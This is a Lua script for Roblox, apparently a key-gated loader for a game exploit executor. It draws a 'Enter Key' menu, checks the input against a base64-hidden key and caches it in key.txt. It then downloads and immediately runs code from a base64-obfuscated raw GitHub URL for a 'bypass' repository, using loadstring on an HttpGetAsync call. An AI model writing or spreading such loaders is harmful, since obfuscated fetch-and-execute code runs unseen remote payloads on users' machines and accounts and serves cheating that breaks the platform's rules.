local b64decode = function(data)
    local b = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    data = string.gsub(data, '[^'..b..'=]', '')
    return (data:gsub('.', function(x)
        if (x == '=') then return '' end
        local r,f='',(b:find(x)-1)
        for i=6,1,-1 do r=r..(f%2^i - f%2^(i-1) > 0 and '1' or '0') end
        return r;
    end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x)
        if (#x ~= 8) then return '' end
        local c=0
        for i=1,8 do c=c + (x:sub(i,i)=='1' and 2^(8-i) or 0) end
        return string.char(c)
    end))
end

local _k = b64decode("dHVhbmJlb2Jlbw==")
local _u = b64decode("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2V1bm9pYTQyL2J5cGFzcy9yZWZzL2hlYWRzL21haW4vU2NyaXB0L01haW4=")

local f = "key.txt"
local p = game:GetService("Players").LocalPlayer
local g = Instance.new("ScreenGui", p:WaitForChild("PlayerGui"))
g.Name = "ObfuscatedKeyMenu"
g.ResetOnSpawn = false

local ok, saved = pcall(function()
    return (isfile and readfile and isfile(f)) and readfile(f)
end)

if saved == _k then
    loadstring(game:HttpGetAsync(_u))()
    return
end

-- UI
local bg = Instance.new("ImageLabel", g)
bg.Size = UDim2.new(1, 0, 1, 0)
bg.Image = "https://images4.alphacoders.com/113/1130246.jpg"
bg.BackgroundTransparency = 1
bg.ImageTransparency = 0.3

local frm = Instance.new("Frame", g)
frm.Size = UDim2.new(0, 300, 0, 150)
frm.Position = UDim2.new(0.5, -150, 0.5, -75)
frm.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
frm.BorderSizePixel = 0
Instance.new("UICorner", frm).CornerRadius = UDim.new(0, 8)

local lbl = Instance.new("TextLabel", frm)
lbl.Size = UDim2.new(1, 0, 0, 40)
lbl.BackgroundTransparency = 1
lbl.Text = "🔑 Enter Key to Continue"
lbl.TextColor3 = Color3.fromRGB(255, 255, 255)
lbl.Font = Enum.Font.GothamBold
lbl.TextScaled = true

local tb = Instance.new("TextBox", frm)
tb.Size = UDim2.new(0.8, 0, 0, 30)
tb.Position = UDim2.new(0.1, 0, 0.45, 0)
tb.PlaceholderText = "Enter key here..."
tb.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
tb.TextColor3 = Color3.fromRGB(255, 255, 255)
tb.TextScaled = true
tb.Font = Enum.Font.Gotham
Instance.new("UICorner", tb).CornerRadius = UDim.new(0, 6)

local btn = Instance.new("TextButton", frm)
btn.Size = UDim2.new(0.8, 0, 0, 30)
btn.Position = UDim2.new(0.1, 0, 0.75, 0)
btn.Text = "Submit"
btn.BackgroundColor3 = Color3.fromRGB(0, 170, 255)
btn.TextColor3 = Color3.fromRGB(255, 255, 255)
btn.TextScaled = true
btn.Font = Enum.Font.GothamBold
Instance.new("UICorner", btn).CornerRadius = UDim.new(0, 6)

btn.MouseButton1Click:Connect(function()
    if tb.Text == _k then
        if writefile then pcall(function() writefile(f, _k) end) end
        g:Destroy()
        loadstring(game:HttpGetAsync(_u))()
    else
        tb.Text = ""
        tb.PlaceholderText = "❌ Wrong key. Try again."
    end
end)
